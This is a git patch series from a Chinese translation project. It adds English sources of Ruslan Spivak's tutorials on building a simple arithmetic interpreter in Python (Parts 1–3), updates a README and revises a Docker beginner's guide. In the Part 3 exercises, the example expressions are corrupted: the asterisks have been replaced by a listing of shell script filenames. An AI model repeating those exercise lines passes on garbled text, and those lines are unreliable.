+The method responsible for finding and interpreting that structure is expr. This method verifies that the sequence of tokens does indeed correspond to the expected sequence of tokens, i.e INTEGER -> PLUS -> INTEGER. After it's successfully confirmed the structure, it generates the result by adding the value of the token on the left side of the PLUS and the right side of the PLUS, thus successfully interpreting the arithmetic expression you passed to the interpreter.
+
+The expr method itself uses the helper method eat to verify that the token type passed to the eat method matches the current token type. After matching the passed token type the eat method gets the next token and assigns it to the current_token variable, thus effectively "eating" the currently matched token and advancing the imaginary pointer in the stream of tokens. If the structure in the stream of tokens doesn't correspond to the expected INTEGER PLUS INTEGER sequence of tokens the eat method throws an exception.
+
+Let's recap what your interpreter does to evaluate an arithmetic expression:
+
+ * The interpreter accepts an input string, let's say "3+5"
+ * The interpreter calls the expr method to find a structure in the stream of tokens returned by the lexical analyzer get_next_token. The structure it tries to find is of the form INTEGER PLUS INTEGER. After it's confirmed the structure, it interprets the input by adding the values of two INTEGER tokens because it's clear to the interpreter at that point that what it needs to do is add two integers, 3 and 5.
+
+Congratulate yourself. You've just learned how to build your very first interpreter!
+
+Now it's time for exercises.
+
+![][12]
+
+You didn't think you would just read this article and that would be enough, did you? Okay, get your hands dirty and do the following exercises:
+
+ 1. Modify the code to allow multiple-digit integers in the input, for example "12+3"
+ 2. Add a method that skips whitespace characters so that your calculator can handle inputs with whitespace characters like " 12 + 3"
+ 3. Modify the code and instead of '+' handle '-' to evaluate subtractions like "7-5"
+
+
+
+**Check your understanding**
+
+ 1. What is an interpreter?
+ 2. What is a compiler?
+ 3. What's the difference between an interpreter and a compiler?
+ 4. What is a token?
+ 5. What is the name of the process that breaks input apart into tokens?
+ 6. What is the part of the interpreter that does lexical analysis called?
+ 7. What are the other common names for that part of an interpreter or a compiler?
+
+
+
+Before I finish this article, I really want you to commit to studying interpreters and compilers. And I want you to do it right now. Don't put it on the back burner. Don't wait. If you've skimmed the article, start over. If you've read it carefully but haven't done exercises - do them now. If you've done only some of them, finish the rest. You get the idea. And you know what? Sign the commitment pledge to start learning about interpreters and compilers today!
+
+
+
+_I, ________, of being sound mind and body, do hereby pledge to commit to studying interpreters and compilers starting today and get to a point where I know 100% how they work!_
+
+Signature:
+
+Date:
+
+![][13]
+
+Sign it, date it, and put it somewhere where you can see it every day to make sure that you stick to your commitment. And keep in mind the definition of commitment:
+
+> "Commitment is doing the thing you said you were going to do long after the mood you said it in has left you." -- Darren Hardy
+
+Okay, that's it for today. In the next article of the mini series you will extend your calculator to handle more arithmetic expressions. Stay tuned.
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://ruslanspivak.com/lsbasi-part1/
+
+作者:[Ruslan Spivak][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://ruslanspivak.com
+[1]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_i_dont_know.png
+[2]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_omg.png
+[3]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_i_know.png
+[4]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_compiler_interpreter.png
+[5]:https://en.wikipedia.org/wiki/Pascal_%28programming_language%29
+[6]:https://docs.python.org/2/library/pdb.html
+[7]:https://github.com/rspivak/lsbasi/blob/master/part1/calc1.py
+[8]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_lexer1.png
+[9]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_lexer2.png
+[10]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_lexer3.png
+[11]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_lexer4.png
+[12]:https://ruslanspivak.com/lsbasi-part1/lsbasi_exercises2.png
+[13]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_commitment_pledge.png
+[14]:http://ruslanspivak.com/lsbaws-part1/ (Part 1)
+[15]:http://ruslanspivak.com/lsbaws-part2/ (Part 2)
+[16]:http://ruslanspivak.com/lsbaws-part3/ (Part 3)
From 76a923bc2a0f24febc4006d9b0e2f2943c7e2321 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 20:04:53 +0800
Subject: [PATCH 252/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Let=E2=80=99s=20B?=
=?UTF-8?q?uild=20A=20Simple=20Interpreter.=20Part=202.?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...t-s Build A Simple Interpreter. Part 2..md | 244 ++++++++++++++++++
1 file changed, 244 insertions(+)
create mode 100644 sources/tech/20150703 Let-s Build A Simple Interpreter. Part 2..md
diff --git a/sources/tech/20150703 Let-s Build A Simple Interpreter. Part 2..md b/sources/tech/20150703 Let-s Build A Simple Interpreter. Part 2..md
new file mode 100644
index 0000000000..b9f923e048
--- /dev/null
+++ b/sources/tech/20150703 Let-s Build A Simple Interpreter. Part 2..md
@@ -0,0 +1,244 @@
+Let’s Build A Simple Interpreter. Part 2.
+======
+
+In their amazing book "The 5 Elements of Effective Thinking" the authors Burger and Starbird share a story about how they observed Tony Plog, an internationally acclaimed trumpet virtuoso, conduct a master class for accomplished trumpet players. The students first played complex music phrases, which they played perfectly well. But then they were asked to play very basic, simple notes. When they played the notes, the notes sounded childish compared to the previously played complex phrases. After they finished playing, the master teacher also played the same notes, but when he played them, they did not sound childish. The difference was stunning. Tony explained that mastering the performance of simple notes allows one to play complex pieces with greater control. The lesson was clear - to build true virtuosity one must focus on mastering simple, basic ideas.
+
+The lesson in the story clearly applies not only to music but also to software development. The story is a good reminder to all of us to not lose sight of the importance of deep work on simple, basic ideas even if it sometimes feels like a step back. While it is important to be proficient with a tool or framework you use, it is also extremely important to know the principles behind them. As Ralph Waldo Emerson said:
+
+> "If you learn only methods, you'll be tied to your methods. But if you learn principles, you can devise your own methods."
+
+On that note, let's dive into interpreters and compilers again.
+
+Today I will show you a new version of the calculator from [Part 1][1] that will be able to:
+
+ 1. Handle whitespace characters anywhere in the input string
+ 2. Consume multi-digit integers from the input
+ 3. Subtract two integers (currently it can only add integers)
+
+
+
+Here is the source code for your new version of the calculator that can do all of the above:
+```
+# Token types
+# EOF (end-of-file) token is used to indicate that
+# there is no more input left for lexical analysis
+INTEGER, PLUS, MINUS, EOF = 'INTEGER', 'PLUS', 'MINUS', 'EOF'
+
+
+class Token(object):
+ def __init__(self, type, value):
+ # token type: INTEGER, PLUS, MINUS, or EOF
+ self.type = type
+ # token value: non-negative integer value, '+', '-', or None
+ self.value = value
+
+ def __str__(self):
+ """String representation of the class instance.
+
+ Examples:
+ Token(INTEGER, 3)
+ Token(PLUS '+')
+ """
+ return 'Token({type}, {value})'.format(
+ type=self.type,
+ value=repr(self.value)
+ )
+
+ def __repr__(self):
+ return self.__str__()
+
+
+class Interpreter(object):
+ def __init__(self, text):
+ # client string input, e.g. "3 + 5", "12 - 5", etc
+ self.text = text
+ # self.pos is an index into self.text
+ self.pos = 0
+ # current token instance
+ self.current_token = None
+ self.current_char = self.text[self.pos]
+
+ def error(self):
+ raise Exception('Error parsing input')
+
+ def advance(self):
+ """Advance the 'pos' pointer and set the 'current_char' variable."""
+ self.pos += 1
+ if self.pos > len(self.text) - 1:
+ self.current_char = None # Indicates end of input
+ else:
+ self.current_char = self.text[self.pos]
+
+ def skip_whitespace(self):
+ while self.current_char is not None and self.current_char.isspace():
+ self.advance()
+
+ def integer(self):
+ """Return a (multidigit) integer consumed from the input."""
+ result = ''
+ while self.current_char is not None and self.current_char.isdigit():
+ result += self.current_char
+ self.advance()
+ return int(result)
+
+ def get_next_token(self):
+ """Lexical analyzer (also known as scanner or tokenizer)
+
+ This method is responsible for breaking a sentence
+ apart into tokens.
+ """
+ while self.current_char is not None:
+
+ if self.current_char.isspace():
+ self.skip_whitespace()
+ continue
+
+ if self.current_char.isdigit():
+ return Token(INTEGER, self.integer())
+
+ if self.current_char == '+':
+ self.advance()
+ return Token(PLUS, '+')
+
+ if self.current_char == '-':
+ self.advance()
+ return Token(MINUS, '-')
+
+ self.error()
+
+ return Token(EOF, None)
+
+ def eat(self, token_type):
+ # compare the current token type with the passed token
+ # type and if they match then "eat" the current token
+ # and assign the next token to the self.current_token,
+ # otherwise raise an exception.
+ if self.current_token.type == token_type:
+ self.current_token = self.get_next_token()
+ else:
+ self.error()
+
+ def expr(self):
+ """Parser / Interpreter
+
+ expr -> INTEGER PLUS INTEGER
+ expr -> INTEGER MINUS INTEGER
+ """
+ # set current token to the first token taken from the input
+ self.current_token = self.get_next_token()
+
+ # we expect the current token to be an integer
+ left = self.current_token
+ self.eat(INTEGER)
+
+ # we expect the current token to be either a '+' or '-'
+ op = self.current_token
+ if op.type == PLUS:
+ self.eat(PLUS)
+ else:
+ self.eat(MINUS)
+
+ # we expect the current token to be an integer
+ right = self.current_token
+ self.eat(INTEGER)
+ # after the above call the self.current_token is set to
+ # EOF token
+
+ # at this point either the INTEGER PLUS INTEGER or
+ # the INTEGER MINUS INTEGER sequence of tokens
+ # has been successfully found and the method can just
+ # return the result of adding or subtracting two integers,
+ # thus effectively interpreting client input
+ if op.type == PLUS:
+ result = left.value + right.value
+ else:
+ result = left.value - right.value
+ return result
+
+
+def main():
+ while True:
+ try:
+ # To run under Python3 replace 'raw_input' call
+ # with 'input'
+ text = raw_input('calc> ')
+ except EOFError:
+ break
+ if not text:
+ continue
+ interpreter = Interpreter(text)
+ result = interpreter.expr()
+ print(result)
+
+
+if __name__ == '__main__':
+ main()
+```
+
+Save the above code into the calc2.py file or download it directly from [GitHub][2]. Try it out. See for yourself that it works as expected: it can handle whitespace characters anywhere in the input; it can accept multi-digit integers, and it can also subtract two integers as well as add two integers.
+
+Here is a sample session that I ran on my laptop:
+```
+$ python calc2.py
+calc> 27 + 3
+30
+calc> 27 - 7
+20
+calc>
+```
+
+The major code changes compared with the version from [Part 1][1] are:
+
+ 1. The get_next_token method was refactored a bit. The logic to increment the pos pointer was factored into a separate method advance.
+ 2. Two more methods were added: skip_whitespace to ignore whitespace characters and integer to handle multi-digit integers in the input.
+ 3. The expr method was modified to recognize INTEGER -> MINUS -> INTEGER phrase in addition to INTEGER -> PLUS -> INTEGER phrase. The method now also interprets both addition and subtraction after having successfully recognized the corresponding phrase.
+
+In [Part 1][1] you learned two important concepts, namely that of a **token** and a **lexical analyzer**. Today I would like to talk a little bit about **lexemes** , **parsing** , and **parsers**.
+
+You already know about tokens. But in order for me to round out the discussion of tokens I need to mention lexemes. What is a lexeme? A **lexeme** is a sequence of characters that form a token. In the following picture you can see some examples of tokens and sample lexemes and hopefully it will make the relationship between them clear:
+
+![][3]
+
+Now, remember our friend, the expr method? I said before that that's where the interpretation of an arithmetic expression actually happens. But before you can interpret an expression you first need to recognize what kind of phrase it is, whether it is addition or subtraction, for example. That's what the expr method essentially does: it finds the structure in the stream of tokens it gets from the get_next_token method and then it interprets the phrase that is has recognized, generating the result of the arithmetic expression.
+
+The process of finding the structure in the stream of tokens, or put differently, the process of recognizing a phrase in the stream of tokens is called **parsing**. The part of an interpreter or compiler that performs that job is called a **parser**.
+
+So now you know that the expr method is the part of your interpreter where both **parsing** and **interpreting** happens - the expr method first tries to recognize ( **parse** ) the INTEGER -> PLUS -> INTEGER or the INTEGER -> MINUS -> INTEGER phrase in the stream of tokens and after it has successfully recognized ( **parsed** ) one of those phrases, the method interprets it and returns the result of either addition or subtraction of two integers to the caller.
+
+And now it's time for exercises again.
+
+![][4]
+
+ 1. Extend the calculator to handle multiplication of two integers
+ 2. Extend the calculator to handle division of two integers
+ 3. Modify the code to interpret expressions containing an arbitrary number of additions and subtractions, for example "9 - 5 + 3 + 11"
+
+
+
+**Check your understanding.**
+
+ 1. What is a lexeme?
+ 2. What is the name of the process that finds the structure in the stream of tokens, or put differently, what is the name of the process that recognizes a certain phrase in that stream of tokens?
+ 3. What is the name of the part of the interpreter (compiler) that does parsing?
+
+
+
+
+I hope you liked today's material. In the next article of the series you will extend your calculator to handle more complex arithmetic expressions. Stay tuned.
+
+
+--------------------------------------------------------------------------------
+
+via: https://ruslanspivak.com/lsbasi-part2/
+
+作者:[Ruslan Spivak][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://ruslanspivak.com
+[1]:http://ruslanspivak.com/lsbasi-part1/ (Part 1)
+[2]:https://github.com/rspivak/lsbasi/blob/master/part2/calc2.py
+[3]:https://ruslanspivak.com/lsbasi-part2/lsbasi_part2_lexemes.png
+[4]:https://ruslanspivak.com/lsbasi-part2/lsbasi_part2_exercises.png
From 156f1f8e9435b7554f079e275d5f437eeb7643ad Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 20:09:07 +0800
Subject: [PATCH 253/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Let=E2=80=99s=20B?=
=?UTF-8?q?uild=20A=20Simple=20Interpreter.=20Part=203.?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...t-s Build A Simple Interpreter. Part 3..md | 340 ++++++++++++++++++
1 file changed, 340 insertions(+)
create mode 100644 sources/tech/20150812 Let-s Build A Simple Interpreter. Part 3..md
diff --git a/sources/tech/20150812 Let-s Build A Simple Interpreter. Part 3..md b/sources/tech/20150812 Let-s Build A Simple Interpreter. Part 3..md
new file mode 100644
index 0000000000..2502d2624a
--- /dev/null
+++ b/sources/tech/20150812 Let-s Build A Simple Interpreter. Part 3..md
@@ -0,0 +1,340 @@
+Let’s Build A Simple Interpreter. Part 3.
+======
+
+I woke up this morning and I thought to myself: "Why do we find it so difficult to learn a new skill?"
+
+I don't think it's just because of the hard work. I think that one of the reasons might be that we spend a lot of time and hard work acquiring knowledge by reading and watching and not enough time translating that knowledge into a skill by practicing it. Take swimming, for example. You can spend a lot of time reading hundreds of books about swimming, talk for hours with experienced swimmers and coaches, watch all the training videos available, and you still will sink like a rock the first time you jump in the pool.
+
+The bottom line is: it doesn't matter how well you think you know the subject - you have to put that knowledge into practice to turn it into a skill. To help you with the practice part I put exercises into [Part 1][1] and [Part 2][2] of the series. And yes, you will see more exercises in today's article and in future articles, I promise :)
+
+Okay, let's get started with today's material, shall we?
+
+
+So far, you've learned how to interpret arithmetic expressions that add or subtract two integers like "7 + 3" or "12 - 9". Today I'm going to talk about how to parse (recognize) and interpret arithmetic expressions that have any number of plus or minus operators in it, for example "7 - 3 + 2 - 1".
+
+Graphically, the arithmetic expressions in this article can be represented with the following syntax diagram:
+
+![][3]
+
+What is a syntax diagram? A **syntax diagram** is a graphical representation of a programming language 's syntax rules. Basically, a syntax diagram visually shows you which statements are allowed in your programming language and which are not.
+
+Syntax diagrams are pretty easy to read: just follow the paths indicated by the arrows. Some paths indicate choices. And some paths indicate loops.
+
+You can read the above syntax diagram as following: a term optionally followed by a plus or minus sign, followed by another term, which in turn is optionally followed by a plus or minus sign followed by another term and so on. You get the picture, literally. You might wonder what a "term" is. For the purpose of this article a "term" is just an integer.
+
+Syntax diagrams serve two main purposes:
+
+ * They graphically represent the specification (grammar) of a programming language.
+ * They can be used to help you write your parser - you can map a diagram to code by following simple rules.
+
+
+
+You've learned that the process of recognizing a phrase in the stream of tokens is called **parsing**. And the part of an interpreter or compiler that performs that job is called a **parser**. Parsing is also called **syntax analysis** , and the parser is also aptly called, you guessed it right, a **syntax analyzer**.
+
+According to the syntax diagram above, all of the following arithmetic expressions are valid:
+
+ * 3
+ * 3 + 4
+ * 7 - 3 + 2 - 1
+
+
+
+Because syntax rules for arithmetic expressions in different programming languages are very similar we can use a Python shell to "test" our syntax diagram. Launch your Python shell and see for yourself:
+```
+>>> 3
+3
+>>> 3 + 4
+7
+>>> 7 - 3 + 2 - 1
+5
+```
+
+No surprises here.
+
+The expression "3 + " is not a valid arithmetic expression though because according to the syntax diagram the plus sign must be followed by a term (integer), otherwise it's a syntax error. Again, try it with a Python shell and see for yourself:
+```
+>>> 3 +
+ File "", line 1
+ 3 +
+ ^
+SyntaxError: invalid syntax
+```
+
+It's great to be able to use a Python shell to do some testing but let's map the above syntax diagram to code and use our own interpreter for testing, all right?
+
+You know from the previous articles ([Part 1][1] and [Part 2][2]) that the expr method is where both our parser and interpreter live. Again, the parser just recognizes the structure making sure that it corresponds to some specifications and the interpreter actually evaluates the expression once the parser has successfully recognized (parsed) it.
+
+The following code snippet shows the parser code corresponding to the diagram. The rectangular box from the syntax diagram (term) becomes a term method that parses an integer and the expr method just follows the syntax diagram flow:
+```
+def term(self):
+ self.eat(INTEGER)
+
+def expr(self):
+ # set current token to the first token taken from the input
+ self.current_token = self.get_next_token()
+
+ self.term()
+ while self.current_token.type in (PLUS, MINUS):
+ token = self.current_token
+ if token.type == PLUS:
+ self.eat(PLUS)
+ self.term()
+ elif token.type == MINUS:
+ self.eat(MINUS)
+ self.term()
+```
+
+You can see that expr first calls the term method. Then the expr method has a while loop which can execute zero or more times. And inside the loop the parser makes a choice based on the token (whether it's a plus or minus sign). Spend some time proving to yourself that the code above does indeed follow the syntax diagram flow for arithmetic expressions.
+
+The parser itself does not interpret anything though: if it recognizes an expression it's silent and if it doesn't, it throws out a syntax error. Let's modify the expr method and add the interpreter code:
+```
+def term(self):
+ """Return an INTEGER token value"""
+ token = self.current_token
+ self.eat(INTEGER)
+ return token.value
+
+def expr(self):
+ """Parser / Interpreter """
+ # set current token to the first token taken from the input
+ self.current_token = self.get_next_token()
+
+ result = self.term()
+ while self.current_token.type in (PLUS, MINUS):
+ token = self.current_token
+ if token.type == PLUS:
+ self.eat(PLUS)
+ result = result + self.term()
+ elif token.type == MINUS:
+ self.eat(MINUS)
+ result = result - self.term()
+
+ return result
+```
+
+Because the interpreter needs to evaluate an expression the term method was modified to return an integer value and the expr method was modified to perform addition and subtraction at the appropriate places and return the result of interpretation. Even though the code is pretty straightforward I recommend spending some time studying it.
+
+Le's get moving and see the complete code of the interpreter now, okay?
+
+Here is the source code for your new version of the calculator that can handle valid arithmetic expressions containing integers and any number of addition and subtraction operators:
+```
+# Token types
+#
+# EOF (end-of-file) token is used to indicate that
+# there is no more input left for lexical analysis
+INTEGER, PLUS, MINUS, EOF = 'INTEGER', 'PLUS', 'MINUS', 'EOF'
+
+
+class Token(object):
+ def __init__(self, type, value):
+ # token type: INTEGER, PLUS, MINUS, or EOF
+ self.type = type
+ # token value: non-negative integer value, '+', '-', or None
+ self.value = value
+
+ def __str__(self):
+ """String representation of the class instance.
+
+ Examples:
+ Token(INTEGER, 3)
+ Token(PLUS, '+')
+ """
+ return 'Token({type}, {value})'.format(
+ type=self.type,
+ value=repr(self.value)
+ )
+
+ def __repr__(self):
+ return self.__str__()
+
+
+class Interpreter(object):
+ def __init__(self, text):
+ # client string input, e.g. "3 + 5", "12 - 5 + 3", etc
+ self.text = text
+ # self.pos is an index into self.text
+ self.pos = 0
+ # current token instance
+ self.current_token = None
+ self.current_char = self.text[self.pos]
+
+ ##########################################################
+ # Lexer code #
+ ##########################################################
+ def error(self):
+ raise Exception('Invalid syntax')
+
+ def advance(self):
+ """Advance the `pos` pointer and set the `current_char` variable."""
+ self.pos += 1
+ if self.pos > len(self.text) - 1:
+ self.current_char = None # Indicates end of input
+ else:
+ self.current_char = self.text[self.pos]
+
+ def skip_whitespace(self):
+ while self.current_char is not None and self.current_char.isspace():
+ self.advance()
+
+ def integer(self):
+ """Return a (multidigit) integer consumed from the input."""
+ result = ''
+ while self.current_char is not None and self.current_char.isdigit():
+ result += self.current_char
+ self.advance()
+ return int(result)
+
+ def get_next_token(self):
+ """Lexical analyzer (also known as scanner or tokenizer)
+
+ This method is responsible for breaking a sentence
+ apart into tokens. One token at a time.
+ """
+ while self.current_char is not None:
+
+ if self.current_char.isspace():
+ self.skip_whitespace()
+ continue
+
+ if self.current_char.isdigit():
+ return Token(INTEGER, self.integer())
+
+ if self.current_char == '+':
+ self.advance()
+ return Token(PLUS, '+')
+
+ if self.current_char == '-':
+ self.advance()
+ return Token(MINUS, '-')
+
+ self.error()
+
+ return Token(EOF, None)
+
+ ##########################################################
+ # Parser / Interpreter code #
+ ##########################################################
+ def eat(self, token_type):
+ # compare the current token type with the passed token
+ # type and if they match then "eat" the current token
+ # and assign the next token to the self.current_token,
+ # otherwise raise an exception.
+ if self.current_token.type == token_type:
+ self.current_token = self.get_next_token()
+ else:
+ self.error()
+
+ def term(self):
+ """Return an INTEGER token value."""
+ token = self.current_token
+ self.eat(INTEGER)
+ return token.value
+
+ def expr(self):
+ """Arithmetic expression parser / interpreter."""
+ # set current token to the first token taken from the input
+ self.current_token = self.get_next_token()
+
+ result = self.term()
+ while self.current_token.type in (PLUS, MINUS):
+ token = self.current_token
+ if token.type == PLUS:
+ self.eat(PLUS)
+ result = result + self.term()
+ elif token.type == MINUS:
+ self.eat(MINUS)
+ result = result - self.term()
+
+ return result
+
+
+def main():
+ while True:
+ try:
+ # To run under Python3 replace 'raw_input' call
+ # with 'input'
+ text = raw_input('calc> ')
+ except EOFError:
+ break
+ if not text:
+ continue
+ interpreter = Interpreter(text)
+ result = interpreter.expr()
+ print(result)
+
+
+if __name__ == '__main__':
+ main()
+```
+
+Save the above code into the calc3.py file or download it directly from [GitHub][4]. Try it out. See for yourself that it can handle arithmetic expressions that you can derive from the syntax diagram I showed you earlier.
+
+Here is a sample session that I ran on my laptop:
+```
+$ python calc3.py
+calc> 3
+3
+calc> 7 - 4
+3
+calc> 10 + 5
+15
+calc> 7 - 3 + 2 - 1
+5
+calc> 10 + 1 + 2 - 3 + 4 + 6 - 15
+5
+calc> 3 +
+Traceback (most recent call last):
+ File "calc3.py", line 147, in
+ main()
+ File "calc3.py", line 142, in main
+ result = interpreter.expr()
+ File "calc3.py", line 123, in expr
+ result = result + self.term()
+ File "calc3.py", line 110, in term
+ self.eat(INTEGER)
+ File "calc3.py", line 105, in eat
+ self.error()
+ File "calc3.py", line 45, in error
+ raise Exception('Invalid syntax')
+Exception: Invalid syntax
+```
+
+
+Remember those exercises I mentioned at the beginning of the article: here they are, as promised :)
+
+![][5]
+
+ * Draw a syntax diagram for arithmetic expressions that contain only multiplication and division, for example "7 0_sync_master.sh 1_add_new_article_manual.sh 1_add_new_article_newspaper.sh 2_start_translating.sh 3_continue_the_work.sh 4_finish.sh 5_pause.sh base.sh env format.test lctt.cfg parse_url_by_manual.sh parse_url_by_newspaper.py parse_url_by_newspaper.sh README.org reformat.sh 4 / 2 0_sync_master.sh 1_add_new_article_manual.sh 1_add_new_article_newspaper.sh 2_start_translating.sh 3_continue_the_work.sh 4_finish.sh 5_pause.sh base.sh env format.test lctt.cfg parse_url_by_manual.sh parse_url_by_newspaper.py parse_url_by_newspaper.sh README.org reformat.sh 3". Seriously, just grab a pen or a pencil and try to draw one.
+ * Modify the source code of the calculator to interpret arithmetic expressions that contain only multiplication and division, for example "7 0_sync_master.sh 1_add_new_article_manual.sh 1_add_new_article_newspaper.sh 2_start_translating.sh 3_continue_the_work.sh 4_finish.sh 5_pause.sh base.sh env format.test lctt.cfg parse_url_by_manual.sh parse_url_by_newspaper.py parse_url_by_newspaper.sh README.org reformat.sh 4 / 2 * 3".
+ * Write an interpreter that handles arithmetic expressions like "7 - 3 + 2 - 1" from scratch. Use any programming language you're comfortable with and write it off the top of your head without looking at the examples. When you do that, think about components involved: a lexer that takes an input and converts it into a stream of tokens, a parser that feeds off the stream of the tokens provided by the lexer and tries to recognize a structure in that stream, and an interpreter that generates results after the parser has successfully parsed (recognized) a valid arithmetic expression. String those pieces together. Spend some time translating the knowledge you've acquired into a working interpreter for arithmetic expressions.
+
+
+
+**Check your understanding.**
+
+ 1. What is a syntax diagram?
+ 2. What is syntax analysis?
+ 3. What is a syntax analyzer?
+
+
+
+
+Hey, look! You read all the way to the end. Thanks for hanging out here today and don't forget to do the exercises. :) I'll be back next time with a new article - stay tuned.
+
+
+--------------------------------------------------------------------------------
+
+via: https://ruslanspivak.com/lsbasi-part3/
+
+作者:[Ruslan Spivak][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://ruslanspivak.com
+[1]:http://ruslanspivak.com/lsbasi-part1/ (Part 1)
+[2]:http://ruslanspivak.com/lsbasi-part2/ (Part 2)
+[3]:https://ruslanspivak.com/lsbasi-part3/lsbasi_part3_syntax_diagram.png
+[4]:https://github.com/rspivak/lsbasi/blob/master/part3/calc3.py
+[5]:https://ruslanspivak.com/lsbasi-part3/lsbasi_part3_exercises.png
From 3ceaeeea448da6754f473ce32d3bca1ad668ed19 Mon Sep 17 00:00:00 2001
From: wxy
Date: Thu, 11 Jan 2018 20:30:30 +0800
Subject: [PATCH 254/371] =?UTF-8?q?=E6=8F=90=E5=8D=87=20lujun9972=20?=
=?UTF-8?q?=E4=B8=BA=E6=A0=B8=E5=BF=83=E6=88=90=E5=91=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@lujun9972 恭喜,辛苦了! 请阅读
https://github.com/LCTT/TranslateProject/blob/master/core.md 了解 core
成员准则。
---
README.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/README.md b/README.md
index 970a67dab0..c7cadf8293 100644
--- a/README.md
+++ b/README.md
@@ -61,6 +61,7 @@ LCTT 的组成
* 2017/03/16 提升 GHLandy、bestony、rusking 为新的 Core 成员。创建 Comic 小组。
* 2017/04/11 启用头衔制,为各位重要成员颁发头衔。
* 2017/11/21 鉴于 qhwdw 快速而上佳的翻译质量,提升 qhwdw 为新的 Core 成员。
+* 2018/01/11 提升 lujun9972 成为核心成员,并加入选题组。
核心成员
-------------------------------
@@ -88,6 +89,7 @@ LCTT 的组成
- 核心成员 @ucasFL,
- 核心成员 @rusking,
- 核心成员 @qhwdw,
+- 核心成员 @lujun9972
- 前任选题 @DeadFire,
- 前任校对 @reinoir222,
- 前任校对 @PurlingNayuki,
From 40f5b26760e7ef779983141e0bb5d8e121fe55ab Mon Sep 17 00:00:00 2001
From: wxy
Date: Thu, 11 Jan 2018 20:37:10 +0800
Subject: [PATCH 255/371] =?UTF-8?q?=E6=9B=B4=E6=96=B0?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.md b/README.md
index c7cadf8293..5b790c6f2a 100644
--- a/README.md
+++ b/README.md
@@ -61,6 +61,7 @@ LCTT 的组成
* 2017/03/16 提升 GHLandy、bestony、rusking 为新的 Core 成员。创建 Comic 小组。
* 2017/04/11 启用头衔制,为各位重要成员颁发头衔。
* 2017/11/21 鉴于 qhwdw 快速而上佳的翻译质量,提升 qhwdw 为新的 Core 成员。
+* 2017/11/19 wxy 在上海交大举办的 2017 中国开源年会上做了演讲:《[如何以翻译贡献参与开源社区](https://linux.cn/article-9084-1.html)》。
* 2018/01/11 提升 lujun9972 成为核心成员,并加入选题组。
核心成员
From c32f41577b3e3918bbb41abecd7acf52feebb72b Mon Sep 17 00:00:00 2001
From: wxy
Date: Thu, 11 Jan 2018 20:44:49 +0800
Subject: [PATCH 256/371] PRF&PUB:20170426 Important Docker commands for
Beginners.md
@lujun9972
---
...Important Docker commands for Beginners.md | 39 ++++++++-----------
1 file changed, 17 insertions(+), 22 deletions(-)
rename {translated/tech => published}/20170426 Important Docker commands for Beginners.md (79%)
diff --git a/translated/tech/20170426 Important Docker commands for Beginners.md b/published/20170426 Important Docker commands for Beginners.md
similarity index 79%
rename from translated/tech/20170426 Important Docker commands for Beginners.md
rename to published/20170426 Important Docker commands for Beginners.md
index 3bd079de0c..c3065ae6a4 100644
--- a/translated/tech/20170426 Important Docker commands for Beginners.md
+++ b/published/20170426 Important Docker commands for Beginners.md
@@ -1,6 +1,7 @@
为小白准备的重要 Docker 命令说明
======
-在早先的教程中,我们学过了[在 RHEL\ CentOS 7 上安装 Docker 并创建 docker 容器 .][1] 在本教程中,我们会学习管理 docker 容器的其他命令。
+
+在早先的教程中,我们学过了[在 RHEL CentOS 7 上安装 Docker 并创建 docker 容器][1]。 在本教程中,我们会学习管理 docker 容器的其他命令。
### Docker 命令语法
@@ -61,7 +62,7 @@ volume Manage Docker volumes
wait Block until a container stops, then print its exit code
```
-要进一步查看某个 command 支持的选项,运行
+要进一步查看某个命令支持的选项,运行:
```
$ docker docker-subcommand info
@@ -77,7 +78,7 @@ $ docker docker-subcommand info
$ docker run hello-world
```
-结果应该是,
+结果应该是:
```
Hello from Docker.
@@ -95,17 +96,17 @@ This message shows that your installation appears to be working correctly.
$ docker search Ubuntu
```
-我们应该会得到 age 可用的 Ubuntu 镜像的列表。记住,如果你想要的是官方的镜像,经检查 `official` 这一列上是否为 `[OK]`。
+我们应该会得到可用的 Ubuntu 镜像的列表。记住,如果你想要的是官方的镜像,请检查 `official` 这一列上是否为 `[OK]`。
### 下载镜像
-一旦搜索并找到了我们想要的镜像,我们可以运行下面语句来下载它,
+一旦搜索并找到了我们想要的镜像,我们可以运行下面语句来下载它:
```
$ docker pull Ubuntu
```
-要查看所有已下载的镜像,运行
+要查看所有已下载的镜像,运行:
```
$ docker images
@@ -113,17 +114,17 @@ $ docker images
### 运行容器
-使用已下载镜像来运行容器,使用下面命令
+使用已下载镜像来运行容器,使用下面命令:
```
$ docker run -it Ubuntu
```
